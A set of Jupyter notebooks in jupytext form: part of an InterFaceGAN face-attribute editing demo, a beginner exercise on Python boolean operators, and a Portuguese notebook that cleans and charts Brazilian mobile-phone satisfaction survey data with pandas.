    NOTE(review): an unknown gan_type leaves `generator` unassigned and
    raises UnboundLocalError at the return — consider an explicit error.
    """
    gan_type = MODEL_POOL[model_name]['gan_type']
    if gan_type == 'pggan':
        generator = PGGANGenerator(model_name)
    elif gan_type == 'stylegan':
        generator = StyleGANGenerator(model_name)
    return generator


def sample_codes(generator, num, latent_space_type='Z', seed=0):
    """Samples latent codes randomly.

    Seeds numpy's global RNG for reproducibility, draws `num` codes in Z
    space, and for StyleGAN with latent_space_type == 'W' pushes them
    through the mapping network to obtain W-space codes.
    """
    np.random.seed(seed)
    codes = generator.easy_sample(num)
    if generator.gan_type == 'stylegan' and latent_space_type == 'W':
        codes = torch.from_numpy(codes).type(torch.FloatTensor).to(generator.run_device)
        codes = generator.get_value(generator.model.mapping(codes))
    return codes


def imshow(images, col, viz_size=256):
    """Shows images in one figure.

    images: array unpacked as (num, height, width, channels); assumed
    uint8 RGB since it is pasted into a uint8 canvas and JPEG-encoded —
    TODO confirm channel order expected by PIL here.
    col: number of columns; num must be divisible by col.
    Each tile is resized to viz_size x viz_size, tiled row-major into one
    canvas, and displayed inline as a JPEG.
    """
    num, height, width, channels = images.shape
    assert num % col == 0
    row = num // col

    # Blank canvas for the tiled mosaic.
    fused_image = np.zeros((viz_size * row, viz_size * col, channels), dtype=np.uint8)

    for idx, image in enumerate(images):
        i, j = divmod(idx, col)
        y = i * viz_size
        x = j * viz_size
        if height != viz_size or width != viz_size:
            image = cv2.resize(image, (viz_size, viz_size))
        fused_image[y:y + viz_size, x:x + viz_size] = image

    fused_image = np.asarray(fused_image, dtype=np.uint8)
    data = io.BytesIO()
    PIL.Image.fromarray(fused_image).save(data, 'jpeg')
    im_data = data.getvalue()
    disp = IPython.display.display(IPython.display.Image(im_data))
    return disp

# + [markdown] id="Q7gkmrVW8eR1"
# # Select a Model

# + id="NoWI4fPQ6Gnf"
#@title { display-mode: "form", run: "auto" }
model_name = "stylegan_ffhq" #@param ['pggan_celebahq','stylegan_celebahq', 'stylegan_ffhq']
latent_space_type = "W" #@param ['Z', 'W']

generator = build_generator(model_name)

# Load the precomputed attribute-separation hyperplane normals; W-space
# boundaries are used for StyleGAN when editing in W.
ATTRS = ['age', 'eyeglasses', 'gender', 'pose', 'smile']
boundaries = {}
for i, attr_name in enumerate(ATTRS):
    boundary_name = f'{model_name}_{attr_name}'
    if generator.gan_type == 'stylegan' and latent_space_type == 'W':
        boundaries[attr_name] = np.load(f'boundaries/{boundary_name}_w_boundary.npy')
    else:
        boundaries[attr_name] = np.load(f'boundaries/{boundary_name}_boundary.npy')

# + [markdown] id="zDStH1O5t1KC"
# # Sample latent codes

# + id="qlRGKZbJt9hA"
#@title { display-mode: "form", run: "auto" }
num_samples = 4 #@param {type:"slider", min:1, max:8, step:1}
noise_seed = 0 #@param {type:"slider", min:0, max:1000, step:1}

latent_codes = sample_codes(generator, num_samples, latent_space_type, noise_seed)
if generator.gan_type == 'stylegan' and latent_space_type == 'W':
    synthesis_kwargs = {'latent_space_type': 'W'}
else:
    synthesis_kwargs = {}

images = generator.easy_synthesize(latent_codes, **synthesis_kwargs)['image']
imshow(images, col=num_samples)

# + [markdown] id="MmRPN3xz8jCH"
# # Edit facial attributes

# + id="ccONBF60mVir"
#@title { display-mode: "form", run: "auto" }
age = 0 #@param {type:"slider", min:-3.0, max:3.0, step:0.1}
eyeglasses = 0 #@param {type:"slider", min:-2.9, max:3.0, step:0.1}
gender = 0 #@param {type:"slider", min:-3.0, max:3.0, step:0.1}
pose = 0 #@param {type:"slider", min:-3.0, max:3.0, step:0.1}
smile = 0 #@param {type:"slider", min:-3.0, max:3.0, step:0.1}

# Move each latent code along every attribute boundary, scaled by the
# slider value.  eval(attr_name) looks up the slider variable of the same
# name — works in this notebook's global scope, but fragile if refactored.
new_codes = latent_codes.copy()
for i, attr_name in enumerate(ATTRS):
    new_codes += boundaries[attr_name] * eval(attr_name)

new_images = generator.easy_synthesize(new_codes, **synthesis_kwargs)['image']
imshow(new_images, col=num_samples)
docs/InterFaceGAN.ipynb
# ---
# jupyter:
#   jupytext:
#     text_representation:
#       extension: .py
#       format_name: light
#       format_version: '1.5'
#       jupytext_version: 1.14.4
#   kernelspec:
#     display_name: Python 3
#     name: python3
# ---

# Boolean-type exercises: identity of cached ints, arithmetic, comparison,
# equality, logical, bitwise, `is`/`is not`, and membership operators.

# + id="7JIFn6BP4M0R" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 34} outputId="bef624fe-afe7-499d-95fb-d25346400e22"
#Declare a boolean value and store it in a variable.
s= True
#Check the type and print the id of the same.
print(type(s),id(s))

# + id="o9bjjhN64kAP" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="7772a180-5131-48ef-ce7b-87ba0addb960"
#Take one boolean value between 0 - 256.
#Assign it to two different variables.
#Check the id of both the variables. It should come same. Check why?
a = 20
b= 20
# FIX: the original printed id(c) and id(d), which were never defined
# (NameError); the variables holding the value are a and b.
print(id(a))
print(id(b))
# Both ids are the same because of object reusability: CPython caches small
# integers (-5..256), and 20 < 256, so both names refer to one object.
# (This explanation was a bare, uncommented line in the original, which is a
# syntax error in the script form of the notebook.)

# + id="yr4ETGSf4l5y" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="c2ade20e-e09b-426c-f94a-924d3ee9aa29"
#Arithmetic Operations on boolean data
#Take two different boolean values.
#Store them in two different variables.
#Do below operations on them:-
#Find sum of both values
#Find differce between them
#Find the product of both.
#Find value after dividing first value with second value
#Find the remainder after dividing first value with second value
#Find the quotient after dividing first value with second value
#Find the result of first value to the power of second value.
a= True
b= False
# NOTE: `sum` and `pow` below shadow the builtins of the same name for the
# rest of the notebook.
sum= a+b
dif= a-b
product= a*b
#division= a/b
#quotient= a//b
#remainder = a%b
pow= a**b
print("sum=", sum)
print("difference=",dif)
# FIX: corrected the printed label typo "prouct=" -> "product=".
print("product=",product)
# print("division",division)
# print("remainder=",remainder)
# print("quotient=", quotient)
print("power=", pow)
# division, quotient and remainder can not be calculated as False is
# considered as "0" (ZeroDivisionError).

# + id="xG4mX84E4n2O" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 68} outputId="4ee560b7-cd9b-4d0e-c639-f1c661ca19ff"
#Comparison Operators on boolean values
#Take two different boolean values.
#Store them in two different variables.
#Do below operations on them:-
#Compare these two values with below operator:-
#Greater than, '>'
#less than, '<'
#Greater than or equal to, '>='
#Less than or equal to, '<='
#Observe their output(return type should be boolean)
a= False
b= True
print(False<True)
print(False>=True)
print(False<=True)

# + id="TUIo2Z9V4qBJ" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 51} outputId="0b8a3156-8165-4cc6-ed32-e18a6281267b"
#Equality Operator
#Take two different boolean values.
#Store them in two different variables.
#Equate them using equality operator (==, !=)
#Observe the output(return type should be boolean)
a= False
b= True
print(False==True)
print(False!=True)

# + id="XukEq5E44rxv" colab_type="code" colab={}
#Logical operators
#Observe the output of below code
#Cross check the output manually
print(True and True) #----------------------------------------->Output is True
print(False and True) #----------------------------------------->Output is False
print(True and False) #----------------------------------------->Output is False
print(False and False) #----------------------------------------->Output is False
print(True or True) #----------------------------------------->Output is True
print(False or True) #----------------------------------------->Output is True
print(True or False) #----------------------------------------->Output is True
print(False or False) #----------------------------------------->Output is False
print(not True) #----------------------------------------->Output is False
print(not False) #----------------------------------------->Output is True

# + id="02jPgt094vK-" colab_type="code" colab={}
#Bitwise Operators
#Do below operations on the values provided below:-
#Bitwise and(&) -----------------------------------------> True, True -------> Output is True
#Bitwise or(|) -----------------------------------------> True, False -------> Output is True
#Bitwise(^) -----------------------------------------> True, False -------> Output is True
#Bitwise negation(~) ------------------------------------> True -------> Output is -2
#Bitwise left shift ------------------------------------> True,2 -------> Output is 4
#Bitwise right shift ------------------------------------> True,2 -------> Output is 0
#Cross check the output manually

# + id="cy5i7sWz4v_c" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 85} outputId="3d9408c0-5659-4076-d09b-a23faf1cebcf"
#What is the output of expression inside print statement.
# FIX: the next sentence was a bare, uncommented line (syntax error) in the
# original; it belongs to the instruction comment above.
#Cross check before running the program.
a = True
b = True
print(a is b) #True or False?
# print(a is not b) #True or False?
a = False
b = False
print(a is b) #True or False?
print(a is not b) #True or False?

# + id="AOcPQi8544M-" colab_type="code" colab={"base_uri": "https://localhost:8080/", "height": 102} outputId="92278e0f-3061-4632-b2a2-326921e098ef"
#Membership operation
#in, not in are two membership operators and it returns boolean value
print(True in [10,10.20,10+20j,'Python', True])
print(False in (10,10.20,10+20j,'Python', False))
print(True in {1,2,3, True})  # True == 1, so membership holds via the cached 1
# NOTE: the dict literal below repeats the key True; the later value (300) wins.
print(True in {True:100, False:200, True:300})
print(False in {True:100, False:200, True:300})

# + id="MPa1Lpco46Ja" colab_type="code" colab={}
shilpi/shilpi_Boolean_Assignement.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Insper - PADS - Atividade Integradora # # ## Computação para Ciência de Dados - Processamento dos dados # Autores: # - <NAME> (<EMAIL>) # # - <NAME> (<EMAIL>) # # Para visualizar o índice, é indicada a instalação do add-in [jupyterlab-toc](https://github.com/jeffjjohnston/RStudioConsoleRender). # # Introdução # # O intuito deste trabalho é preparar e analisar dados de entrevistas de uma pesquisa de satisfação de prestação de Serviço Móvel pessoal. Posteriormente, serão aplicados modelos preditivos em R para criar um classificador de satisfação (alta ou baixa) de clientes. A variável resposta é a J1 - Nível de satisfação geral do entrevistado com a prestadora citada, levando em conta toda a experiência. # # A base de dados utilizada está disponível [neste link](http://dados.gov.br/dataset/banco-de-dados-da-pesquisa-telefonia-movel-pre-paga). # # ## Objetivo # # Preparar, organizar e analisar graficamente os dados para modelagem preditiva, principalmente com as bibliotecas [Pandas](https://pandas.pydata.org) e [Matplotlib](https://matplotlib.org). # ## Bibliotecas import pandas as pd import numpy as np import datetime as dt from pandas_ods_reader import read_ods import matplotlib.pyplot as plt from matplotlib.ticker import PercentFormatter import seaborn as sns import pandasql # %matplotlib inline # ## Dados # Como o pandas nativo não lê arquivos ODS, utilizou-se uma biblioteca específica. raw = read_ods('data/BD_PRE.ods', sheet = 1) bd_pre = raw.copy() # Após a leitura é possível ter uma ideia do conteúdo e formato das variáveis presentes na base de dados: bd_pre.head() bd_pre.info() # # Organização e limpeza # # Antes de manipular a base, foi consultada a documentação para entender melhor cada questão. A seguir um resumo. 
# ## Tipos de variáveis # # * Tipo 1: **1 = Sim ou 2 = Não** # - Colunas: Q1, Q3, Q4, Q5, D1, F1, F3, F5, I1 e I2 # # # * Tipo 2: variáveis medidas em uma escala de percepção de qualidade, que varia de **0 (Péssimo) a 10 (Excelente), ou 99 (Não Sabe, Não Responde)** # - Colunas: B1 (B1_1 e B1_2), C1 (C1_1 e C1_2), D2 (D2_1 à D2_3), E1 (E1_1 à E1_3), A2 (A2_1 à A2_3), A3, A4, A5, F2, F4, F6 # # # * Tipo 3: variáveis que não possuem opções de escolha, apenas entrada direta de informações # - Colunas: Q8, H0, H1 e H2 # # # * Tipo 4: variáveis que possuem suas opções específicas diretamente após sua definição # - As variáveis Q2, H2 e I1 possuem opções de resposta diferentes para os questionários ao longo dos anos e estarão devidamente indicadas. # - As variáveis H0 e I2 foram acrescentadas a partir da pesquisa do ano de 201 # ## Itens da pesquisa # # - Q: Perguntas # - A: Canais de Atendimento # - B: Oferta e Contratação # - C: Funcionamento de Voz # - D: Funcionamento de Dados (3G/4G) # - E: Recarga # - F: Capacidade de Resolução # - G: Competição # - H: Perfil Sócio demográfico # - I: Autorização para identificação # ## Limpeza da base # ### Ajuste de datas # Como a base é muito grande, o ajuste do formato da data na leitura pode sobrecarregar ou deixar ainda mais demorado o processo de leitura. Portanto o ajuste é feito após a base ser carregada no pandas. bd_pre['DATA'] = pd.to_datetime(bd_pre['DATA'], format='%Y-%m-%d') bd_pre['ANO_BASE'] = bd_pre['ANO_BASE'].astype(int) bd_pre.info() # ### Padronização # Como a pesquisa foi realizada em momentos diferentes, algumas respostas mudam ao longo dos anos. Para modelar, é necessário padronizar essas respostas. # - Q2 - Área de trabalho do entrevistado: bd_pre.Q2.unique() # Segundo a documentação, 7 é a resposta do ano 2015 e corresponde a "Nenhum dos lugares informados". Pode, portanto, ser substituída por 2, que representa a mesma coisa nos anos subsequentes. 
bd_pre.Q2.replace(7,2, inplace = True) # - H2 - Faixa de renda bd_pre.H2.describe() # A diferença está apenas nas respostas não dadas: 999997, 999998 - sem renda/não sabe, e 999999 - recusa. Nesse primeiro momento, serão substituídas por NaN. para avaliar a distribuição da amostra sem esses valores. # (O comentário ao lado de cada linha representa a média quando o valor é substituído por 0) bd_pre.H2.replace([999997,999998], np.nan, inplace = True) #0: média 1540 bd_pre.H2.replace([999999], np.nan, inplace = True) #tudo NA: média 1965 +-3718 bd_pre.H2.describe() # Como alguns modelos não aceitam valores faltantes, todos eles serão susbtituídos por 0. Como o valor mínimo é 100, ainda é possível identificar quem não quis compartilhar essa informação. bd_pre.H2.fillna(0, inplace = True) # - H2a - Faixa de renda vs Salário mínimo bd_pre.H2a.describe() # Antes de tratar os casos não respondidos dessa questão, podemos extrair informações para a pergunta anterior. A seguir, as pessoas que não informaram a renda, mas informaram a faixa: bd_pre[['H2','H2a']][bd_pre['H2'] == 0].groupby(['H2a']).count() (6298+1268+438+197+156)/148016*100 # 6% da base pode ter a informação de renda preenchida pela faixa. Para isso, será criada uma nova coluna combinando os dados das duas colunas mais adiante. # Vale observar também se existem pessoas que não informaram a faixa, mas informaram a renda. bd_pre[['H2','H2a','ANO_BASE']][bd_pre.H2a.isna()] # Como a resposta 999998 não está na documentação da questão H2a, será considerada como "Não respondeu", análoga ao item anterior. 
# Assim como no item H2, todos que não informaram a renda terão o valor substituído por 0: Faixa não informada bd_pre.H2a.replace([98,99,999998,999999],0,inplace = True) # + #bd_pre.ANO_BASE.unique() # + #conditions = [bd_pre.ANO_BASE <= 2016, bd_pre.ANO_BASE >= 2017] # + #choice_0 = [bd_pre.H2a.replace([98,99],0, inplace = True),bd_pre.H2a.replace([999998], np.nan, inplace = True)] np.nan #choice_na = [bd_pre.H2a.replace([999998, 999998], np.nan, inplace = True), bd_pre.H2a.replace([99], np.nan, inplace = True)] #np.nan # + #np.select(conditions,choice_0) #np.select(conditions,choice_na) # - bd_pre.H2a.value_counts() bd_pre.H2a.describe() # A seguir, observa-se a distribuição das respostas por ano e quantas pessoas informaram ou não a renda na questão H2. pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['H2a']) pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['H2']==0) # Considerando as duas tabelas acima (coluna 0 da primeira e coluna True da segunda), nota-se que nos dois primeiros anos da pesquisa, quem não informou a renda também não informou a faixa. Como o número de respostas que podem ser completadas é pequeno, será mantida a resposta "0" para quem não compartilhou essa informação. # - H2b - Combinação das colunas H2 e H2a para estimar a renda. # Na documentação, constam as faixas e valores por salário mínimo. No entanto, as informações vão até 2017, enquanto os dados vão até 2019. Para contornar essa falta de informação, serão puxados os dados sobre valores nominais do salário mínimo. Idealmente, esses dados estariam disponíveis no [Portal Brasileiro de Dados Abertos](http://www.dados.gov.br/dataset/salario-minimo/resource/8b9ccf0d-aff2-499f-8363-0fcd44ec68b3), mas o link parece não estar funcionando, e a última atualização dos dados foi em 2016. # # Felizmente, essa informação está disponível em csv no [IPEADATA](http://www.ipeadata.gov.br/Default.aspx), alimentada pelo Ministério do Trabalho e Emprego. 
# IPEADATA minimum-wage series: column 0 = date ("YYYY.MM"), column 1 = nominal value.
sm = pd.read_csv('data/ipeadata[15-04-2020-08-50].csv', usecols = [0,1], names = ['Data','Valor'], skiprows = 1, dtype = {'Data': object})
sm.head()

sm.info()

# Split the "YYYY.MM" date string into separate year and month columns.
sm[['Ano','Mes']] = sm.Data.str.split('.', expand = True)
sm.head()

sm.Ano = sm.Ano.astype(int)

# Como o valor é o mesmo para todos os anos, pode-se agrupar a base:

sm_ano = sm.groupby('Ano').mean()

# Dessa forma, temos os mesmos valores que constam na documentação:

sm_ano.tail(6)

# Abaixo, os valores que podem ser substituídos:

pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['H2a'][bd_pre['H2'] == 0])

# Como a divisão das faixas da questão H2a variam ano a ano, e as informações que podem ser substituídas começam em 2017, será adotada a divisão de para esses dados. Além disso, será considerado o valor médio de cada faixa, exceto pela primeira e pela última. Como as faixas de 2015 são diferentes, esse ano será tratado separadamente.

# Bracket code -> multiple of the minimum wage (midpoint of each bracket,
# except the open-ended first and last brackets).
faixas = {0:0, 1:2, 2:(2+4)/2, 3:(4+6)/2, 4:(6+10)/2, 5:10} #faixa : múltiplos do salário mínimo
faixas

# 2015 used a different bracket table.
faixas_15 = {0:0, 1:1, 2:(1+2)/2, 3:(3+4)/2, 4:(4+6)/2, 5:(6+10)/2, 6:10}
faixas_15

bd_pre['sm'] = bd_pre.ANO_BASE.map(sm_ano.Valor) #busca o valor de salário mínimo para cada ano
bd_pre.head()

# Pick the bracket table by survey year: 2015 vs 2016 onwards.
conditions = [bd_pre.ANO_BASE == 2015, bd_pre.ANO_BASE >= 2016]
choice = [bd_pre.H2a.map(faixas_15), bd_pre.H2a.map(faixas)]
bd_pre['sm_mult'] = np.select(conditions,choice)

# H2b: keep the reported income when present, otherwise estimate it as
# bracket-multiple * minimum wage of the survey year.
bd_pre['H2b'] = np.where(bd_pre.H2 !=0 , bd_pre.H2, bd_pre['sm_mult'].mul(bd_pre.sm)) #multiplica a faixa por valor do salário mínimo
bd_pre.head()

bd_pre.H2b.describe()

bd_pre.H2.describe()

# Com a coluna criada, pode-se remover as colunas auxiliares criadas:

bd_pre.drop(['sm','sm_mult'], axis = 1, inplace = True)
bd_pre.head()

# - I1 - Autorização para identificação das respostas para a empresa que solicitou a pesquisa (2015) ou para a Anatel (a partir de 2016)

pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['I1'])

# Na documentação, consta que a resposta 3 é correspondente a "Não sabe".
# Como é uma amostra pequena, será mantida na base, mas com o valor 0.

bd_pre['I1'].replace(3,0, inplace = True)

# ### Tratamento de NAs

# Colunas com valores faltando:

colunas_na = bd_pre.columns[bd_pre.isna().any()].sort_values()
colunas_na

# Valores de resposta em cada questão:

for col in colunas_na:
    print(col, bd_pre[col].unique())

# - Perguntas com resposta Sim/Não:

# Para otimizar, foi criada uma função para substituir os valores conforme cada questão.

def na_sim_nao(col, valor_sim, valor_nao = 'na', fill_na = 2):
    """Normalize one yes/no question column of the global `bd_pre` frame.

    Maps the question-specific "yes" code (`valor_sim`) to 1, fills missing
    answers with `fill_na` (default 2 = "no"), and, when an explicit "no"
    code is supplied via `valor_nao`, maps it to 2.
    NOTE(review): mutates the module-level DataFrame `bd_pre` in place.
    """
    bd_pre[col].replace(valor_sim,1,inplace = True)
    bd_pre[col].fillna(fill_na, inplace = True)
    if valor_nao != 'na':
        bd_pre[col].replace(valor_nao, 2,inplace = True)

for i in range(1,5):
    #print('A1_'+str(i), bd_pre['A1_'+str(i)].unique())
    print('A1_'+str(i)+'\n', bd_pre['A1_'+str(i)].value_counts()) #respostas 'Sim'
    print('')

# Each A1_* question encodes "yes" with a different code (1, 2, 3, 97).
na_sim_nao('A1_1',1)
na_sim_nao('A1_2',2)
na_sim_nao('A1_3',3)
na_sim_nao('A1_4',97)

#conferência dos valores substituídos.
for i in range(1,5):
    #print('A1_'+str(i), bd_pre['A1_'+str(i)].unique())
    print('A1_'+str(i)+'\n', bd_pre['A1_'+str(i)].value_counts())
    print('')

# - F5 - A questão F5 depende da resposta da pergunta D1:
#
# "Descreve se o usuário entrou em contato com a prestadora citada para falar sobre problemas na internet 3G/4G nos 6 meses anteriores à pesquisa, apenas para os que responderam SIM para a utilização da internet móvel (D1)"
#
# D1: Descreve se o usuário utilizou o serviço de internet 3G/4G seis meses anteriores à pesquisa."

# Entende-se, portanto que quem respondeu "não" à pergunta D1, também não entrou em contato para falar sobre esse assunto.
# Os valores faltantes serão substituídos por 2, que significa "Não"

print(bd_pre.D1.value_counts())
bd_pre.D1.value_counts().sum()

bd_pre[['D1','F5']]

bd_pre['F5'][bd_pre['D1']==2].unique()

# F5 unanswered -> 2 ("No"), consistent with a "No" answer to D1.
bd_pre.F5.fillna(2,inplace = True)
bd_pre.F5.value_counts()

# - I2 - Assim como na questão I1, os valores faltantes serão padronizados para 0 - "Não sabe", para uma análise preliminar.

pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['I2'])

pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre.I2.fillna(0))

# Conforme consta na documentação, essa pergunta não foi realizada nem em 2015, e aparentemente nem em 2019. Uma solução seria replicar a resposta da coluna I1, visto que as perguntas são parecidas. Para isso, é necessário avaliar se as respostas que foram dadas são iguais nas duas colunas.

bd_pre.I2[bd_pre.I1 == 1].fillna(0).value_counts()

bd_pre.I2[bd_pre.I1 == 2].fillna(0).value_counts()

# Como é observado, podem existir respostas para as perguntas I1 diferentes da I2, portanto, a melhor alternativa é substituir o valor faltante por 0: "Não sabe"

bd_pre.I2.fillna(0, inplace = True)

# - Perguntas com respostas contínuas que possuem NA na resposta:

colunas_na = bd_pre.columns[bd_pre.isna().any()].sort_values()
colunas_na

col_na = colunas_na #.drop(['H2','H2a']) #tirando variáveis de renda
col_na

# Para todas as perguntas, 99 significa 'Não sabe' ou 'Não respondeu'. Portanto, os NAs serão substituídos por 99.

for col in col_na:
    bd_pre[col].fillna(99, inplace = True)

# Com isso, todos os valores faltantes foram eliminados da base:

bd_pre.info()

# Para facilitar a visualização, as respostas não dadas (99) de todas as perguntas do Tipo 2 serão substituídas por -1.

# "Type 2" (scale) questions: recode 99 ("don't know / no answer") as -1 so
# the sentinel sits below the valid scale instead of above it.
tipo_2 = ['B1_1','B1_2','C1_1','C1_2','D2_1','D2_3','E1_1','E1_2','E1_3','A2_1','A2_2','A2_3','A3','A4','A5','F2','F4','F6']

for col in tipo_2:
    bd_pre[col].replace(99,-1,inplace = True)

# Além das perguntas tipo 2, algumas outras questões possuem valores "não informados".
# Esses casos serão tratados a seguir:

# - Q8 - Idade do entrevistado

bd_pre.Q8.describe()

# Como algumas pessoas não identificaram a idade, esse valor será primeiramente substituído por NaN, para que a média real da base seja revelada.

bd_pre.Q8.replace(999999,np.nan, inplace = True)
bd_pre.Q8.describe()

# - Q8a - Faixa etária

bd_pre.Q8a.describe()

# Aparentemente não houve nenhuma resposta em que não foi informada a faixa etária. Também não houve nenhum entrevistado com menos de 18 anos.

pd.crosstab(index=bd_pre['ANO_BASE'], columns=bd_pre['Q8a'])

bd_pre.Q8a.value_counts()

bd_pre.Q8a[bd_pre.Q8.isna()].value_counts()

# Como a informação da faixa etária está disponível em todos os casos, e o valor é pequeno considerando o tamanho da amostra, a resposta da idade Q8 será substituída pela média da faixa etária, conforme consta na documentação:
# 1. Menor de 16
# 2. De 16 a 17 anos
# 3. De 18 a 24 anos
# 4. De 25 a 30 anos
# 5. De 31 a 35 anos
# 6. De 36 a 40 anos
# 7. De 41 a 50 anos
# 8. De 51 a 70 anos
# 9. Mais de 70 anos
#
# 99 Recusa
#

# Age-bracket code -> midpoint age (bracket 9 is open-ended, so 70 is used).
idade_avg = {3:(18+24)/ 2 , 4:(25+30)/ 2 , 5:(31+35)/ 2, 6:(36+40)/ 2 , 7:(41+50)/ 2 , 8: (51+70)/2, 9: 70}
idade_avg

# Por fim, os valores NA da questão Q8 são substituídos com a média da idade de cada faixa.

bd_pre.Q8.describe()

bd_pre.Q8.fillna(bd_pre.Q8a.map(idade_avg), inplace = True)

bd_pre.Q8.describe()

# Como é possível observar, a média final e desvio padrão da base sofreram uma alteração mínima (a média foi de 36.839180 para 36.846797).

# - H0: Cidade

bd_pre.H0.value_counts()

# Aparentemente, a maior ocorrência é "vazia". Nesses casos, será substituída por "OUTRA", como já consta na base.

bd_pre.H0.replace('','OUTRA', inplace = True)
bd_pre.H0.value_counts()

# - COD_IBGE

bd_pre.COD_IBGE.value_counts()

# Nos itens em que não há informação do código do IBGE será inserido o código 0.
bd_pre.COD_IBGE.replace('',0, inplace = True)
bd_pre.COD_IBGE.value_counts()

# ### Distribuição das amostras

# Com todas as transformações realizadas no item anterior, é possível ter uma ideia melhor da distribuição de cada coluna com valor numérico:

bd_pre.describe().T

stats = bd_pre.describe().T.sort_values('std') #colunas organizadas em ordem crescente do desvio padrão

# Colunas com desvio padrão nulo, ou seja, que possuem apenas uma resposta e, portanto, não vão influenciar os modelos, são removidas da base para otimizar o processamento.

# Constant columns (std == 0) carry no information for the models.
valor_unico = stats[stats['std'] == 0].T.columns.sort_values().tolist()
valor_unico

valor_unico.append('TIPO')
valor_unico

#remover colunas
bd_pre.drop(valor_unico, axis = 1, inplace = True)
bd_pre.info()

# ### Variável resposta

# Como o objetivo é criar um classificador para as respotas da pergunta J1, primeiro serão analisadas as respostas faltantes (99):

# Share (%) of rows with no J1 answer.
(bd_pre[bd_pre['J1'] == 99].shape[0]/bd_pre.shape[0])*100

# Como apenas 0,15% da amostra não possui resposta, essas linhas serão removidas da base.

bd_pre['J1'].replace(99, np.nan, inplace = True)
bd_pre.dropna(subset = ['J1'], inplace = True)
bd_pre.info()

# Por fim, será gerada uma nova coluna com a classificação conforme a nota:
# **Alta**, para notas maiores ou iguais a 8, ou **baixa**.

# Binary target: "Alta" for grades >= 8, otherwise "Baixa".
bd_pre['Resposta'] = np.where(bd_pre.J1 >= 8, 'Alta', 'Baixa')
bd_pre.head()

# # Análise gráfica

# ## Comparação do nível de satisfação

sns.set(style="ticks", palette="pastel")

# Antes de iniciar as comparações, segue a distribuição da nota de avaliação:

bd_pre.J1.hist()

# Para ter uma ideia das avaliações, serão feitas comparações em percentual da resposta por operadora, estado e data da entrevista.
# Para facilitar, será criada uma função:

formatter = PercentFormatter()

def grafico_pct(col_name, group = 0):
    """Plot, for each value of `col_name`, the percentage of "Alta"/"Baixa"
    answers as a grouped bar chart. Reads the global `bd_pre` frame.
    NOTE(review): the `group` parameter is currently unused here.
    """
    temp = pd.crosstab(index = bd_pre[col_name],columns = bd_pre['Resposta'])
    # Row-normalise the counts so each pair of bars sums to 100%.
    temp.div(temp.sum(axis = 1), axis = 0).mul(100).plot(kind='bar', stacked=False, zorder=3, figsize = (15,8), color =["g", "r"])
    plt.gca().yaxis.set_major_formatter(formatter)
    plt.grid(zorder=0)
    plt.legend(loc = 'upper right')

# ### Por Operadora

grafico_pct('OPERADORA')

# Oi e Tim são as únicas operadoras com mais notas baixas do que altas, enquanto Nextel é a operadora com melhor avaliação.

# ### Por Região

# - Estado

grafico_pct('ESTADO')

# AL é o estado com melhor avaliação, enquanto DF é o de pior nota.

# ### Por Data

# Busca de relações com dia da semana, mês e ano da entrevista em números absolutos.

# Função para gerar os gráficos:

def analise_data(col_name, group = 0):
    """Plot absolute "Alta"/"Baixa" counts of `bd_pre` grouped by a
    date-derived column; `group` chooses how DATA is bucketed
    ('week_day', 'month', or 0 to use `col_name` as-is).
    NOTE(review): writes the derived column back into the global `bd_pre`.
    """
    week_days = ['Sunday', 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday']
    if group == 'week_day':
        bd_pre[col_name] = bd_pre.DATA.dt.strftime('%A')
        # Ordered categorical so bars follow calendar order, not alphabetical.
        bd_pre[col_name] = pd.Categorical(bd_pre[col_name], categories = week_days, ordered=True)
    elif group == 'month':
        bd_pre[col_name] = bd_pre.DATA.dt.strftime('%m')
    #bd_pre.groupby(col_name).count().sort_values(col_name)
    temp = pd.crosstab(index = bd_pre[col_name],columns = bd_pre['Resposta'])
    temp.plot(kind='bar', stacked=False, zorder=3, figsize = (15,8), color =["g", "r"])
    plt.grid(zorder=0)
    plt.legend(loc = 'upper right')

# - Dia da semana

analise_data('DIA_SEMANA','week_day')

analise_data('MES','month')

# Aparentemente existe uma concentração da quantidade de entrevistados no segundo semestre do ano, exceto pelo último mês.

grafico_pct('MES')

bd_pre.MES = bd_pre.MES.astype(int)

# Olhando a distribuição percentual, é possível ver melhor a diferença entre as avaliações para cada mês.
# - Anual analise_data('ANO_BASE') # ## Matriz de correlação # Para nortear o restante da análise gráfica, vamos observar a correlação com a nota da resposta ('J1') corr_matrix = bd_pre.corr() corr_matrix['J1'].sort_values(ascending = False) maiores_corr = corr_matrix[corr_matrix['J1'] > 0.5]['J1'].sort_values(ascending = False).index.tolist() maiores_corr.append('Resposta') #maiores_corr.append('ESTADO') #maiores_corr.append('OPERADORA') maiores_corr.append('H2') maiores_corr.remove('J1') sns.set(style="ticks", palette="pastel") sns.pairplot(data = bd_pre[maiores_corr], hue = 'Resposta', palette=["r", "g"]) # Pelos gráficos, a única conclusão evidente é a quantidade de respostas de renda não informada. Devido a isso, vamos olhar mais de perto esses dados. # ### Renda (H2, H2a e H2b) grafico_pct('H2a') plt.legend(loc = 'lower right') # Aparentemente, quanto maior a faixa de renda, pior a avaliação. Além disso, aqueles que não informaram a renda avaliaram bem o serviço em sua pequena maioria. sns.scatterplot(data = bd_pre, x = 'H2b', y = 'J1', hue = 'Resposta') sns.scatterplot(data = bd_pre[bd_pre['H2'] == 0], x = 'H2b', y = 'J1', hue = 'Resposta') sns.boxplot(data = bd_pre, x = 'OPERADORA', y = 'H2b', hue = 'Resposta', palette=["r", "g"]) plt.xticks(rotation=90) plt.legend(loc = 'lower right') # ### Comprometimento da operadora # + active="" # B1_2: Nota atribuída com respeito ao comprometimento da operadora em cumprir o que foi prometido e divulgado em sua publicidade. 
# -

sns.set(style="ticks", palette="pastel")
